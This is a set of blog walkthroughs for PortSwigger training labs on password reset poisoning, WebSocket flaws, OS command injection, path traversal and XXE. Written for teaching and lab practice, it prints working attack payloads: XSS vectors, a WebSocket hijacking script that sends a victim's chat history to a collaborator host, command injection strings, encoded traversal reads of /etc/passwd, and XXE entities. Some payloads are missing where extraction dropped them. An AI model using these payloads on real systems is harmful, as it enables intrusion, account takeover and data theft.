PortSwigger- Basic Password Reset Poisoning

Hello Folks,
This blog focuses on HTTP Host Header vulnerability. We will cover the basics of the HTTP Host header and then we will see a practical implementation of identifying this vulnerability using the PortSwigger platform. In this blog, we will solve the “Basic password reset poisoning” lab under Password Reset Poisoning. So, let’s begin and understand this vulnerability before exploiting the same.
The host header is an HTTP request header that helps to specify which website we want to access. Without this header, our request will not be able to reach the actual web server.
The HTTP Host header vulnerability arises when the server processes the value of the Host header in an insecure way without validating it. The attacker can exploit this header and perform malicious server-side attacks like web cache poisoning, Business logic flaw, routing based SSRF, SQL injection, password reset poisoning, etc.
Here, we are going to see how we can perform a password reset poisoning attack using the Host Header vulnerability. In this attack, the attacker will try to poison the Password reset functionality of a website by pointing the password reset token to the attacker’s public server. Once the attacker can access the token value, the victim’s password can be easily changed.
Let’s understand the same with the help of PortSwigger’s lab.

Lab- Basic password reset poisoning

First, we will read the lab’s description and then click on the “Access the Lab” button. This lab can be solved using Burp Suite Community Edition.
Once the target application is up and running, we have to click on the “My account” button. We will find a login page here. We have to click on the “Forget your password?” button to target the password reset functionality. We need to provide the username/email of the account whose password we have to reset. We will provide “wiener” as the username.
After submitting the username, we have to go to our exploit server and click on the “Email client” button to access the email server. We will find an email with the password reset link for the wiener user. Let’s click on the email to reset the password. We can provide a new password to reset the password of the wiener user. We can now log in as wiener user with the help of the new password.
Now we have to switch to Burp Suite and go to the “HTTP history” sub-tab where we will find a POST request to /forgot-password used to generate the password reset link for the wiener user. To identify HTTP Host header vulnerability, we have to take this request to Repeater and replace the original Host header with any arbitrary URL (cyberiumx.com). Once we send this request, we will find another password reset link on our email where the actual domain name is replaced with our arbitrary domain name.

1.1 Got

Let’s come back to Burp Repeater and this time we will change the value of the Host header to the URL of our exploit server. Also, we have to change the username to carlos so that we can send a password change email to our victim user. Now as soon as the user clicks on the link, their password reset token will be sent to our exploit server logs. Let’s check the logs of our exploit server by clicking on the “Access log” button available on our exploit server. There we will find an entry with the token of the victim user.

1.3 got token

Let’s copy the token and send the following URL to reset the password of carlos user:


As soon as we send this request, we will find a password reset page where we can provide a new password for carlos user. Now let’s log in as carlos user to solve the lab.
Using this lab, we understood how can we identify HTTP Host header vulnerability and exploit it to reset the password of any user. In the upcoming labs, we will explore more attacks using HTTP Host header vulnerability.
You can also explore other Web application vulnerabilities on our website.

Happy Pentesting!
Team CyberiumX

PortSwigger- WebSocket Vulnerability

Hello folks,

This blog focuses on how we can identify and exploit WebSocket vulnerabilities on websites. We will be providing a detailed walkthrough of all PortSwigger’s Lab. Readers should have basic knowledge of WebSockets.

You can check out the Portswigger’s labs for WebSocket vulnerability here.

Let’s proceed without any delay and begin the penetration testing process.

Before starting the labs, let us understand what WebSockets are? A client (often a web browser) and a server can communicate in real-time and in both directions using the WebSockets protocol via a single, persistent connection. WebSockets allow both the client and the server to transmit messages to each other at any time without the need to establish a new connection for each message, in contrast to traditional HTTP requests, which are normally started by the client and handled by the server. This is a new technology and hence contains vulnerabilities. So, let us dive into the identification and exploitation of WebSocket related vulnerabilities.

Lab-1 Manipulating WebSocket messages to exploit vulnerabilities

By altering the contents of WebSocket messages, it is possible to discover and take advantage of the majority of input-based vulnerabilities affecting WebSockets. Let us find out how we can manipulate WebSocket messages.

Access the lab and open Burp Suite Community edition in order to identify WebSocket vulnerability.

1.1 Webpage

On the home page, we will find a “Live chat” option. Let us click on it. It will take us to a chatting functionality where we will be having a live conversation with the support agent.

Let us enter anything to initiate the chat and proxy everything through Burp Suite.

1.2. Chat feature

Go to Burp suite and click on “WebSocket history” under Proxy tab. Here we will find all the WebSocket requests and responses that were exchanged between client and server. Let us search for a message request that we sent to the server and send that request to the repeater.

1.3. Send to repeater

Let’s switch to the repeater tab and change the value of the message to a malicious JavaScript payload which should generate an alert() on the support agent’s browser who is communicating with us. Here is the payload to trigger alert():

<img src=x onerror=alert(“CyberiumX”)>

Send the request which will trigger this payload on the browser of the support agent.

1.4. cross site payload

So this is how we can manipulate the WebSocket messages to trigger XXS. This will solve the lab as well.

1.5. Lab solved


Lab-2 Manipulating the WebSocket handshake to exploit vulnerabilities

Only by interfering with the WebSocket handshake may some WebSocket vulnerabilities be discovered and taken advantage of. These vulnerabilities frequently entail design errors, such as improper reliance on HTTP headers like the X-Forwarded-For header to make security determinations. Let’s dive into and find how to perform it.

Access the lab and open Burp Suite Community edition in order to identify XXE vulnerability.

2.1 Webpage

On the home page, we will find a “Live chat” option. Let us click on it. It will take us to a chatting functionality where we will be having a live conversation with the support agent.

Let us enter anything to initiate the chat and proxy everything through Burp Suite.

2.2 chat feature

Go to Burp suite and click on “WebSocket history” under Proxy tab. Here we will find all the WebSocket requests and responses that were exchanged between client and server. Let us search for a message request that we sent to the server and send that request to the repeater.

2.3 repeater

Let’s switch to the repeater tab and change the value of the message to a malicious JavaScript payload which should generate an alert() on the support agent’s browser who is communicating with us. Here is the payload to trigger alert():

<img src=x onerror=alert(“CyberiumX”)>

Send the request. We will find that the attack has been detected due to an aggressive XXS filter implemented server side.

2.4 xss not working

Also, we will find that the connection has been disconnected. So we need to reconnect with the server by clicking on the Reconnect option.

It will open another window where we can see our reconnect request as well as the response received from the server. Let us click on Response and will find that our IP address has been blacklisted or blocked which means we cannot reconnect with the server using our IP.

2.5 address is blacklisted

We have a header which might help us out here if it is supported by the server. The header is “X-Forwarded-For” which helps us to change our IP to whatever we will provide as a value to this header. So let’s add a header as follows:

X-Forwarded-For: 1

Click on Connect.

2.7 XXS worked

We will find that we are again connected with the server. Now we will again make some changes in the payload and try the same steps again if we are disconnected again.

Finally, after trying some XXS payloads, the following payload worked:

<iMG Src=x oNeRRor=alert`“CyberiumX”`>

2.7 XXS worked

So, this is how we can manipulate WebSocket handshakes to exploit XXS vulnerability. This will solve the lab as well.

Lab-3 Cross-site WebSocket hijacking

Cross-site request forgery (CSRF) vulnerability on a WebSocket handshake is what causes cross-site WebSocket hijacking, also referred to as cross-origin WebSocket hijacking. It occurs when the WebSocket handshake request does not contain any CSRF tokens or other unpredictable information and instead entirely depends on HTTP cookies to handle sessions. So let’s find out how we can exploit it.

Access the lab and open Burp Suite Professional in order to identify XXE vulnerability. Our webpage will open in a while.

3.1 webpage

On the home page, we will find a “Live chat” option. Let us click on it. It will take us to a chatting functionality where we will be having a live conversation with the support agent.

Let us enter anything to initiate the chat and proxy everything through Burp Suite.

3.2 chat feature

Go to Burp suite and click on “HTTP history” under the Proxy tab. Search for a GET request to /chat endpoint and right click on the request and click on Copy URL.
3.3 copy url

Now open the exploit server and in the body section type the following code:


    var ws = new WebSocket(‘wss://websocket_url’);

    ws.onopen = function() {



    ws.onmessage = function(event) {

        fetch(‘https://Burp_collaborator_url’, {method: ‘POST’, mode: ‘no-cors’, body: event.data});



In place of websocket_url, paste the copied URL. Remember to remove https:// from the copied URL. Now, let us open Burp Collaborator, copy the subdomain of collaborator and paste the URL in place of Burp_collaborator_url.

Store the payload and click on “Deliver exploit to victim”.

3.4 Create the

Now, switch to Burp Collaborator window and click on “Poll now”. We will find some interaction with our collaborator subdomain. Let us check the HTTP requests by clicking on each HTTP request and then clicking on “Request to Collaborator”.

We will find a POST request and in the body of which we will find the chats of our victim in JSON format. Now let’s look for the chat where the support agent has provided the password for the victim user. We also got the username of Victim as “Carlos”.

3.5 burp collaborator

Now copy the Password, go to the “My account” page and login as carlos with the help of the copied password. We will find that we are logged in successfully and the lab is also solved.

3.6 loggedin

This is how we can identify and exploit WebSocket related vulnerabilities.

You can check out our other writeup blogs on PortSwigger’s labs here.

Happy Pentesting!!!

Team CyberiumX

Portswigger- Command Injection Vulnerability

Hello folks,

This blog focuses on how we can identify and exploit Command Injection vulnerabilities on websites. This is also known as OS Command Injection vulnerability. In this blog, I will be providing a detailed walkthrough of all PortSwigger’s Lab. I am assuming that you guys have basic knowledge of Linux and Windows Operators.

You can check out the Portswigger’s labs for Command Injection vulnerability here.

Let’s proceed without any delay and begin the penetration testing process.

Lab 1- OS command injection, simple case

In this lab scenario, we will be looking at a simple case of Command Injection without any defense in place. The rule 1 in order to exploit this vulnerability is to look for GET and POST parameters on the website. After that, we will simply try to execute OS commands using different operators used on Windows and Linux Operating systems.

Let’s access the lab. We will require the Burp Suite Community edition here.

1.1 Webpage 1

There are many products available on the home page of the website. We can click on the “View details” button of any product and find that there is a “Check Stock” feature available on the webpage. Let us click on it.

1.2 Check stock

Go to Burp suite’s Proxy tab then click on HTTP History tab to access all the recently browsed pages and web requests.

There you will find a POST request to the “/product/stock” endpoint. Take the request to repeater.

1.3 Proxy tab

Go to repeater tab and in order to identify which parameter is vulnerable to command injection, we need to use the following payload as a value for each parameter starting from productId parameter:

 & whoami &

After typing the above payload, select the payload and press Ctrl + u to URL encode the whole payload.


Let me explain this payload to you guys. We want to run the “whoami” command, so in order to execute it we provided a URL encoded & operator (%26), one in the beginning and another one in the end. The reason for using & operator is to execute the previous process in the background and then execute the next command. Also, the URL encoding of space is +.

Simply send the request from Burp Repeater.

1.4 whoami command

We will get the output of whoami command in the response which confirms that this parameter is vulnerable to command injection vulnerability. This will solve the lab.

1.5 Lab solved 1


Lab 2- Blind OS command injection with time delays

In this scenario, we will be understanding what Blind Command Injection vulnerability is and what are the possible ways through which we can identify and exploit it? Blind means that you will not get the output of any command in the response but you can still exploit it using various methods. So, first of all we will be identifying blind command injection vulnerability by generating time delays.

Let’s access the lab. We will require the Burp Suite Community edition here.

2.1 webpage 2

We will find a “Submit feedback” button in the top right corner. Let us click on it and see what functionality we have here.

Over here, we can provide feedback to the website by submitting a feedback form which has four parameters: Name, Email, Subject and Message. Let us fill the form with any random values and click on the “Submit feedback” button. You will get a message on the web page “Thank you for submitting feedback!

2.2 Submitting feedback

Go to Burp suite’s Proxy tab then click on HTTP History tab to access all the recently browsed pages and web requests.

There you will find a POST request to the “/feedback/submit” endpoint. Take the request to repeater.

2.3 proxy tab

Go to repeater tab and in order to identify which parameter is vulnerable to command injection, we need to use the following payload as a value for each parameter:

 & ping –c 10 &

After typing the above payload, select the payload and press Ctrl + u to URL encode whole payload.


Let me explain this payload to you guys. We want to run “ping” command so that we can confirm that the web application is waiting for the command to completely execute and then bring back the response to us. The IP that we have used here is called a Loopback address which is its own interface. In the response, we will not get any output (blind). Hence this will cause a time delay which will help us to confirm blind command injection vulnerability on the parameter. Now, in order to execute it, we provided URL encoded “&” operator (%26), one in the beginning and another one in the end. The reason for using “&” operator is to execute the previous process in the background and then execute the next command. Also, URL encoding of space is +.

Firstly, let us use the above payload on the Name parameter

Simply send the request from Burp Repeater.

2.4 Name para not vuln

You will find that you are getting the response immediately which confirms that the parameter is not vulnerable. Now, try the same payload on Email parameter. Simply send the request from Burp Repeater.

2.5 Email para is vuln

This time you will find that we got the response after 6 seconds which we can confirm from the bottom right corner.

So, we got our vulnerable parameters but this must not have solved the lab because in order to solve it we need 10 seconds time delay.

Let us create another payload where we will increase the number of ping packets to 12 as follows:


Again, let’s send the request from Burp Repeater.

2.6 Got 10secs delay

This time we can see that we got the time delay of more than 10 seconds.

There is another command that I would like to discuss here. “Sleep” command allows you to wait for the number of seconds we specified in the command and it will also generate the time delay. Let us try it.


Again, let’s send the request from Burp Repeater.

2.7 Sleep command

You will again find that we got the delay of exactly around 10 seconds which will help you to solve the lab.

2.8 Lab solved


Lab 3- Blind OS command injection with output redirection

In this scenario, we will be learning about how we can exploit blind command injection vulnerability by simply redirecting the output of any command into a file which we can easily access on the target website. Let’s see it in action.

Let’s access the lab. We will require the Burp Suite Community edition here.

3.1 webpage 2

We will find a “Submit feedback” button in the top right corner. Let us click on it and see what functionality we have here.

Over here, we can provide feedback to the website by submitting a feedback form which has four parameters: Name, Email, Subject and Message. Let us fill the form with any random values and click on the “Submit feedback” button. You will get a message on the web page “Thank you for submitting feedback!

3.2 submit feedback

Go to Burp suite’s Proxy tab then click on HTTP History tab to access all the recently browsed pages and web requests.

There you will find a POST request to the “/feedback/submit” endpoint. Take the request to repeater.

3.3 proxy tab

Go to repeater tab and in order to identify which parameter is vulnerable to command injection, we need to use the following payload as a value for each parameter:


It is the same payload that we used in the previous lab to confirm that the parameter is vulnerable to blind command injection vulnerability. Let us directly try the payload on email parameter.

Send the request from Burp Repeater.

3.4 email para is vuln

We can confirm that the parameter is vulnerable as we got the time delay of around 9 seconds. Great! Let us now change the payload and try to redirect the output of whoami command to any file which we can create in /var/www/images. This location is already provided to us in the lab description. Now the payload will look like the following:


Here we are executing the whoami command and then redirecting the output to a file named a.txt using (>) operator which is then stored in the provided location.

3.5 whoami command

Now simply we need to find an image on the webpage and replace the name of the image with our filename and see if it is allowing us to get the command output.

3.6 image filename para

Let’s replace the filename with a.txt and hit enter. We will find that we are getting the output of the whoami command.

3.7 output of whoami

This will solve the lab.

3.8 Lab solved


Lab 4- Blind OS command injection with out-of-band interaction

In this scenario, we will learn about exploiting blind command injection vulnerability using OAST techniques. We can check if the parameter is vulnerable by using commands like ping or nslookup to send a request to a domain that we control. So, we need to use Burp Collaborator. Let us see how to exploit it.

Let’s access the lab. We will require the Burp Suite Professional edition here.

4.1 webpage 2

We will find a “Submit feedback” button in the top right corner. Let us click on it and see what functionality we have here.

Over here, we can provide feedback to the website by submitting a feedback form which has four parameters: Name, Email, Subject and Message. Let us fill the form with any random values and click on the “Submit feedback” button. You will get a message on the web page “Thank you for submitting feedback!

4.2 submit feedback

Go to Burp suite’s Proxy tab then click on HTTP History tab to access all the recently browsed pages and web requests.

There you will find a POST request to the “/feedback/submit” endpoint. Take the request to repeater.

4.3 proxy tab

Now in order to use OAST techniques, we need a Burp Collaborator. So, we will open it and copy the Collaborator’s subdomain by clicking on “Copy to Clipboard”.

Go to repeater tab and in order to identify which parameter is vulnerable to command injection, we need to use the following payload as a value for each parameter:


Here, we are simply trying to ping the collaborator’s subdomain to confirm that if we receive any DNS requests on our Collaborator window then the parameter is vulnerable. Let us directly try the payload on email parameters.

Send the request from Burp Repeater.

4.4 Email para is vuln

Now, we will switch to the Burp Collaborator window and click on “Poll now” to check if we received any DNS requests or not.

4.5 Burp COllaborator

We will find that we received some interaction with subdomain which confirms that the email parameter is vulnerable to blind command injection vulnerability.

We can also use nslookup to send DNS requests to the subdomain using the following payload:


Send the request from Burp Repeater.

4.6 nslookup

Now, we will switch to the Burp Collaborator window and click on “Poll now” to check if we received any DNS requests or not.

4.7 Burp Collab nslookup

We will again find that we received some interaction with the subdomain. Hence it will solve the lab also.

4.8 Lab solved


Lab 5- Blind OS command injection with out-of-band data exfiltration

In the final scenario, we will learn how we can exfiltrate data using OAST techniques. We will use Burp Collaborator’s subdomain to get (exfiltrate) the output of any command. Let us begin the process.

Let’s access the lab. We will require Burp Suite Professional edition here.

5.1 Webpage 1

We will find a “Submit feedback” button in the top right corner. Let us click on it and see what functionality we have here.

Over here, we can provide feedback to the website by submitting a feedback form which has four parameters: Name, Email, Subject and Message. Let us fill the form with any random values and click on the “Submit feedback” button. You will get a message on the web page “Thank you for submitting feedback!

5.2 submit feedback

Go to Burp suite’s Proxy tab then click on HTTP History tab to access all the recently browsed pages and web requests.

There you will find a POST request to the “/feedback/submit” endpoint. Take the request to repeater.

5.3 Proxy tab

Now in order to use OAST techniques, we need a Burp Collaborator. So, we will open it and copy the Collaborator’s subdomain by clicking on “Copy to Clipboard”.

Go to repeater tab and in order to identify which parameter is vulnerable to command injection, we need to use the following payload as a value for each parameter:


Here, we are simply trying to use a command whoami as a subdomain of collaborator’s domain and using ping command to confirm that if we receive any DNS requests on our Collaborator window then the parameter is vulnerable and it will contain the output of whoami command. Let us directly try the payload on email parameter.

Send the request from Burp Repeater.

5.4 Email para is vuln

Now, we will switch to the Burp Collaborator window and click on “Poll now” to check if we received any DNS requests or not.

We will find that we received some interaction with subdomain which confirms that the email parameter is vulnerable to blind command injection vulnerability. If we click on any DNS request, we will find the output of whoami command as a subdomain of the collaborator’s domain name.

5.5 burp collaborator

We can submit the output of the whoami command and this will solve the lab.

5.6 Lab solved

We have discovered many ways to identify and exploit Command Injection Vulnerabilities.

You can also check out our other PortSwigger blogs here.

Happy Pentesting!!!

Team CyberiumX

PortSwigger- Path Traversal Vulnerability

Hello folks,

This blog focuses on how we can identify and exploit Path Traversal vulnerabilities on websites. This is also known as Directory Traversal vulnerability. In this blog, I will be providing a detailed walkthrough of all PortSwigger’s Lab on Path Traversal. I am assuming that you guys have basic knowledge of it.

You can check out the Portswigger’s labs for Path Traversal vulnerability here.

Let’s proceed without any delay and begin the penetration testing process.

Lab 1- File path traversal, simple case

In this lab scenario, we will be looking at a simple case of Path Traversal without any defense in place. The rule 1 in order to exploit this vulnerability is to look for GET parameters and then try to add dot dot slash combinations (../) to access other files stored on the server.

Let’s access the lab. We will not require a Burp Suite here.

1.1 Website

There are many products available on the home page of the website. We will click on “View details” button of any product and find that there is a “productId” parameter on the URL but if you try to include the ../ combinations, you will find that it is not vulnerable to path traversal.

1.2 invalid productid

We will keep on looking for some other parameters. If we open the image in the new tab by right clicking on the image and selecting the “Open image in new tab” option, we will find that there is another parameter named “filename” which might be vulnerable to path traversal.

1.3 FIlename Parameter

Now we will replace the image name with our path traversal payload as follows:


And we can see that it worked as we have a small image in our browser.

1.4 execured

Now in order to see the passwd file we can simply add view-source: in front of the whole URL and it will help us to see the source code of the webpage which will show the contents of the passwd file.

1.5 Got passwd

This will help us to solve the lab.

1.6 SOlved


Lab 2- File path traversal, traversal sequences blocked with absolute path bypass

Many web applications will implement some common obstacles to prevent Path traversal vulnerability but these defenses can be circumvented. Here in this scenario, we will be exploring a bypass technique using the absolute path of the file that we want to read.

Access the lab. We will not require Burp Suite here.

2.1 Webpage 1

There are many products available on the home page of the website. We will click on the “View details” button of any product and find that there is a “productId” parameter on URL. We can try different bypass steps but this parameter is not vulnerable.

We will keep on looking for some other parameters. Let’s try the same filename parameter after accessing the image in a new tab. Now we will replace the image name with our path traversal payload as follows:


We will find that we got an error saying “No such file”.

2.2 No such file

Now we will simply remove the path traversal sequence and directly provide the absolute path of the file that we want to read as follows:


And we can see that it worked as we have a small image in our browser.

2.3 it worked

Now in order to see the passwd file we can simply add view-source: in front of the whole URL and it will help us to see the source code of the webpage which will show the contents of the passwd file.

2.4 passwd file

This will help us to solve the lab.

2.5 Solved


Lab 3- File path traversal, traversal sequences stripped non-recursively

In this scenario we will understand another obstacle which we might find in real-time websites. The web application can filter out dot dot slash (../) combinations in order to stop path traversal attack. Let us understand what we can do to easily bypass it.

Access the lab. We will not require a Burp Suite here.

3.1 Webpage 1

There are many products available on the home page of the website. We will click on the “View details” button of any product and find that there is a “productId” parameter on the URL. We can try different bypass steps but this parameter is not vulnerable.

We will keep on looking for some other parameters. Let’s try the same filename parameter after accessing the image in a new tab. Now we will replace the image name with our path traversal payload as follows:


We will find that we got an error saying “No such file”.

3.2 no such file

Let us now add the nested path traversal sequences like ….// or ….\/ which will work as the inner sequence will be filtered out and rest will help you to read the contents of system files. So the payload will be:


And we can see that it worked as we have a small image in our browser.

3.3 It worked

Now in order to see the passwd file we can simply add view-source: in front of the whole URL and it will help us to see the source code of the webpage which will show the contents of the passwd file.

3.4 Passwd file

This will help us to solve the lab.

3.5 solved


Lab 4- File path traversal, traversal sequences stripped with superfluous URL-decode

In this scenario, we will learn another concept to bypass the obstacles for path traversal vulnerability by simply encoding the ../ characters using URL encoding. Let us understand the concept.

Access the lab. We will not require a Burp Suite here.

4.1 Webpage 1

There are many products available on the home page of the website. We will click on the “View details” button of any product and find that there is a “productId” parameter on the URL. We can try different bypass steps but this parameter is not vulnerable.

We will keep on looking for some other parameters. Let’s try the same filename parameter after accessing the image in a new tab. So the payload will be:


We will find that we got an error saying “No such file”.

4.2 no such file

Let us now URL encode the ../ combination and use it as follows in order to bypass it:

filename= %2e%2e%2f %2e%2e%2f %2e%2e%2f %2e%2e%2f %2e%2e%2f/etc/passwd

Here, %2e%2e%2f is the URL encoding of ../ sequence. After using this payload, we will find that again we are still getting the same error.

4.3 url encode didt worked

Let us now try to perform double URL encoding on our payload as follows:

filename=%252e%252e%252f %252e%252e%252f %252e%252e%252f %252e%252e%252f %252e%252e%252f/etc/passwd

Here %252e%252e%252f is the double URL encoding of ../ sequence. We will find that it worked as we have a small image in our browser.

4.4 worked

Now in order to see the passwd file we can simply add view-source: in front of the whole URL and it will help us to see the source code of the webpage which will show the contents of the passwd file.

4.5 passwd file

This will help us to solve the lab.

4.6 solved


Lab 5- File path traversal, validation of start of path

In this scenario, we will see that the application can also validate the start of file path which will allow us to read those files which will have the same start of path but there is a method through which we can exploit it. Let’s try it out.

Access the lab. We will not require Burp Suite here.

5.1 web page

There are many products available on the home page of the website. We will click on the “View details” button of any product and find that there is a “productId” parameter on the URL. We can try different bypass steps but this parameter is not vulnerable.

We will keep on looking for some other parameters. Let’s try the same filename parameter after accessing the image in a new tab. You will find that this time there is a pre-defined path “/var/www/images”. Now we will replace the image name with our path traversal payload as follows:


We will find that we got an error saying “Missing parameter filename”.

5.2 missing parameter

Let us add the start of path as “/var/www/images” and after that we can add the same ../ sequence to read the contents of /etc/passwd file as follows:


And we can see that it worked as we have a small image in our browser.

5.3 it worked

Now in order to see the passwd file we can simply add view-source: in front of the whole URL and it will help us to see the source code of the webpage which will show the contents of the passwd file.

5.4 passwd file

This will help us to solve the lab.

5.5 solved 1


Lab 6- File path traversal, validation of file extension with null byte bypass

Sometimes, the application might check the extension of the file which you asked for and if that extension is not the expected one then we need to add the extension at the end of the file with null byte character (%00). Let’s find out how we can bypass this restriction.

Access the lab. We will not require Burp Suite here.

6.1 webpage

There are many products available on the home page of the website. We will click on the “View details” button of any product and find that there is a “productId” parameter on the URL. We can try different bypass steps but this parameter is not vulnerable.

We will keep on looking for some other parameters. Let’s try the same filename parameter after accessing the image in a new tab. Note the allowed extension of the image file.  Now we will replace the image name with our path traversal payload as follows:


We will find that we got an error saying “No such file”.

6.2 no such file

Let us add the null byte character (%00) at the end and after that we will add the expected file extension which is jpg as follows:


And we can see that it worked as we have a small image in our browser. Now let us understand how this payload is working. Null byte character is a URL encoded character which means nothing and also we added the jpg extension which will trick the application into sending the request further as the file is ending with the expected extension but the server side code will only consider till passwd as after it we have added the null byte which means the file name ends there.

6.3 it worked

Now in order to see the passwd file we can simply add view-source: in front of the whole URL and it will help us to see the source code of the webpage which will show the contents of the passwd file. This will solve the lab as well.

6.4 passwd file

We discovered many ways to identify and bypass the restriction for path traversal vulnerability. So this was all about Path traversal aka Directory traversal vulnerability.

You can also check out our other blogs here.

Happy Pentesting!!!

Team CyberiumX

PortSwigger- Finding Hidden XXE Attack Surfaces

Hello folks,

This blog will focus on how we canidentify and exploit hidden XXE attack surfaces for XML External Entities (XXE) injection vulnerabilities on websites. Here, I will be providing a detailed walkthrough of PortSwigger’s XXE Attack Practitioner Lab. Let’s proceed without any delay and begin the penetration testing process.

Click here to access the XXE labs on PortSwigger.

Lab-1 Exploiting XInclude to retrieve files

There are many applications which do not directly parse the XML code but instead embed the code in an XML document and then parse the whole document. In these situations, we cannot define and control any entity. But we have a mechanism called XInclude which is used to include subdocuments in the main XML document. So, let’s explore it more.

Access the lab and open Burp Suite in order to identify XXE attack vulnerability. Our web page will open in a while.

1.1 Webpage

In order to identify XXE attacks, we need to find any XML related parameters on our website for which we have to look around and click on different links that we have on the webpage.

Let’s click on the “View Details” button to check out the details of the products mentioned on the home page. Now scroll down, we’ll find a stock check feature which allows us to check out the remaining stock of the product.

1.2 Check Stock

Go to Burp Suite and click on “Proxy tab” and then on “HTTP history” tab to look for the POST request that came on Burp Suite.

1.3 Post req

Take this request to the repeater by Right clicking on the request and then clicking on the “Send to Repeater” option.

Here we can see that we do not have any XML content in the body of POST request. Instead we have 2 parameters in the body. Let us check by adding an entity in one of the parameters as follows:


I have URL encoded “&” symbol so that it might not consider it as a delimiter.

We can see that we received an error related to entities which is confirming that the value of productId parameter is being parsed to an XML document.

1.4 Confirmed XXE input

Now let us use the following XInclude payload in order to exploit the vulnerability:

<foo xmlns:xi=”http://www.w3.org/2001/XInclude”>

<xi:include parse=”text” href=”file:///etc/passwd”/></foo>

We got the contents of “/etc/passwd” file in the output.

1.5 Got passwd file

This will solve the lab as well.

1.6 Lab Solved

So we can see that by adding XInclude mechanism we can simply include any subdocument in an XML document.


Lab 2- Exploiting XXE attack via image file upload

In some applications we will find that the application will allow us to upload a file with XML related input. There are many extensions which can have XML data in it like docx, svg, etc. Let us find out how we can exploit XXE attack using file upload.

Access the lab and open Burp Suite in order to identify XXE attack vulnerability. Our web page will open in a while.

2.1 Webpage

We will identify any upload functionality on the website. You can see that there are some posts available on the home page. Let’s open one of them and then scroll down, we will find a comment section where there is an upload functionality which allows us to upload any image as our avatar.

2.2 Comment functionality

Let’s create a malicious svg file using our terminal with following command:

nano image.svg

It will allow us to create a new image file with the name image.svg. Now let us type following content in the file in order to exploit the vulnerability:

<?xml version=”1.0″ standalone=”yes”?><!DOCTYPE test [ <!ENTITY CyberiumX SYSTEM “file:///etc/hostname” > ]><svg width=”128px” height=”128px” xmlns=”http://www.w3.org/2000/svg” xmlns:xlink=”http://www.w3.org/1999/xlink” version=”1.1″><text font-size=”16″ x=”0″ y=”16″>&CyberiumX;</text></svg>

Here we want the contents of the “/etc/hostname” file.

2.3 Malicious FIle Creation

Now let us save the file and exit using Ctrl+s and Ctrl+x respectively. We will upload the file in the comment section and post the comment.

2.4 Upload the file

Now we will go back to the same post and find our comment mentioned below with an avatar image that we uploaded. Open the image in a new tab and there we will find the contents of the hostname file.

2.5 Got Hostname

So we can see how we can upload the malicious XML file like images with svg extension. Hence our lab is also solved.

2.6 Lab Solved

We have completed the XXE injection vulnerability series here on our blog. You can check out our previous blogs on XXE attack here. We will be releasing more vulnerabilities.

Also, you can check out our other blogs on Cyber Security and Penetration Testing here.

Happy Pentesting!!!

Team CyberiumX

PortSwigger | Overview of XXE Vulnerability | Walkthrough

Hello folks,

This blog focuses on how we can identify and exploit XML External Entities (XXE) Vulnerabilities on websites. In this blog, I will be providing a detailed walkthrough of PortSwigger’s XXE Apprentice Lab. Also, I will be covering all XXE Vulnerability Labs in my other upcoming blogs. Let’s proceed without any delay and begin the penetration testing process.

Click here to access the XXE labs on PortSwigger.

Before moving further, you should have little understanding of XML language and how to create its payload.

Lab-1 Exploiting XXE Vulnerabilities using external entities to retrieve files

There are two lab scenarios that we are going to cover here. First one is how to retrieve local files stored on a Web server using external entities. Second one is how we can perform SSRF attacks using external entities.
So let’s start with retrieving sensitive files. Access the lab and open Burp Suite in order to identify XXE vulnerability. Our web page will open in a while.

1.1 Webpage e1688884779797

In order to identify XXE, we need to find any XML related parameters on our website so for that we have to look around and click on different links that we have on the webpage.

Let’s click on the “View Details” button to check out the details of the products mentioned on the home page. Now scroll down, we’ll find a stock check feature which allows us to check out the remaining stock of the product.

1.2 Stock check e1688884809728

Go to Burp Suite and click on “Proxy tab” and then on “HTTP history” tab to look for the POST request that came on Burp Suite.

1.3 Post Req

Take this request to the repeater by right clicking on the request and clicking on the “Send to Repeater” option.

Now, at the bottom of the POST request where we can see the XML content, insert the external entity definition between XML declaration and the StockCheck element as follows:

<!DOCTYPE penetrate [ <!ENTITY CyberiumX SYSTEM “file:///etc/passwd”> ]>

Also mention &CyberiumX; as a reference to the external entity by replacing the ProductId number to make a call to this entity. Send the request and we will get a response with the contents of the passwd file.

1.4 Got passwd file

Hurray!!!. We have successfully identified and exploited our first XXE vulnerability on PortSwigger and hence the lab is solved.

1.5 Lab solved e1688884912273


Lab-2 Exploiting XXE to perform SSRF attacks

In this scenario we have to perform a SSRF attack using XXE. For those who do not know about SSRF vulnerability, let me give an explanation. SSRF stands for Server Side Request Forgery. It allows an attacker to send a malicious request to the web server forcing it to perform an external or internal request to some other machines on the behalf of the attacker.

So here we have to force the server to send a request to IP address and check if we are getting any response from it by exploiting XXE vulnerability.

We will do the same thing as we did previously. So, let’s access the lab and connect it with Burp Suite in order to identify XXE vulnerability. Our web page will open in a while.

2.1 webpage

In order to identify XXE, we need to find any XML related parameters on our website so for that we have to look around and click on different links that we have on the webpage.

Let’s click on the “View Details” button to check out the details of the products mentioned on the home page. Now scroll down, we’ll find a stock check feature which allows us to check out the remaining stock of the product.

2.2 stock check

Go to Burp Suite and click on “Proxy tab” and then on “HTTP history” tab to look for the POST request that came on Burp Suite.

2.3 Post req

Take this request to the repeater by right clicking on the request and clicking on the “Send to Repeater” option.

Now, at the bottom of the POST request where we can see the XML content, insert the external entity definition between XML declaration and the StockCheck element as follows:

<!DOCTYPE penetrate [ <!ENTITY CyberiumX SYSTEM “”> ]>

Also mention &CyberiumX; as a reference to the external entity by replacing the ProductId number to make a call to this entity. Let’s send the request and we will see that we are getting “latest” written as the output which might be the next directory.

2.4 Got another webpage

So, keep on adding the identified directories and send the request using Burp Repeater. The final payload will look like this:

<!DOCTYPE penetrate [ <!ENTITY CyberiumX SYSTEM “”> ]>

After sending this final payload, we will receive some information about admin user out of which we require “SecretAccessKey”.

2.5 GotSecret key

Hurray!!!. We have successfully identified and exploited SSRF vulnerability with the help of XXE vulnerability on PortSwigger and hence the lab is solved.

2.6 Solved

We have completed two basic labs on XXE. Next you guys can start with Blind XXE vulnerabilities on PortSwigger. You can check it out here on our blog.

Also, you can check out our other blogs on Cyber Security and Penetration testing here.

Happy Pentesting!!!

Team CyberiumX